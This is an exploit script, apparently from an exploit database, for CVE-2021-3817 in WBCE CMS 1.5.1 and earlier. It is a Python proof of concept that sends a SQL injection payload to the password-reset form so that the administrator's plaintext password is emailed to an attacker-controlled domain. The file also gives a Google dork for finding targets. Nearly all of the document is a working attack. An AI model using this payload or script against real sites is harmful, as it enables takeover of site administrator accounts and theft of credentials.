# Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset# Google Dork: intext: "Way Better Content Editing"# Date: 20/12/2021# Exploit Author: citril or https://github.com/maxway2021# Vendor Homepage: https://wbce.org/# Software Link: https://wbce.org/de/downloads/# Version: <= 1.5.1# Tested on: Linux# CVE : CVE-2021-3817# Github repo: https://github.com/WBCE/WBCE_CMS# Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75import requests
_url ='http://localhost/wbce/admin/login/forgot/index.php'# from mylocalhost environment
_domain ='pylibs.org'# you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature
headers ={'User-Agent':'Mozilla/5.0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8','Accept-Language':'en-US,en;q=0.5','Content-Type':'application/x-www-form-urlencoded','Connection':'close'}
_p ="email=%27/**/or/**/user_id=1/**/or/**/'admin%40"+ _domain +"&submit=justrandomvalue"
r = requests.post(url = _url, headers = headers, data = _p)if r.status_code ==200:print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')
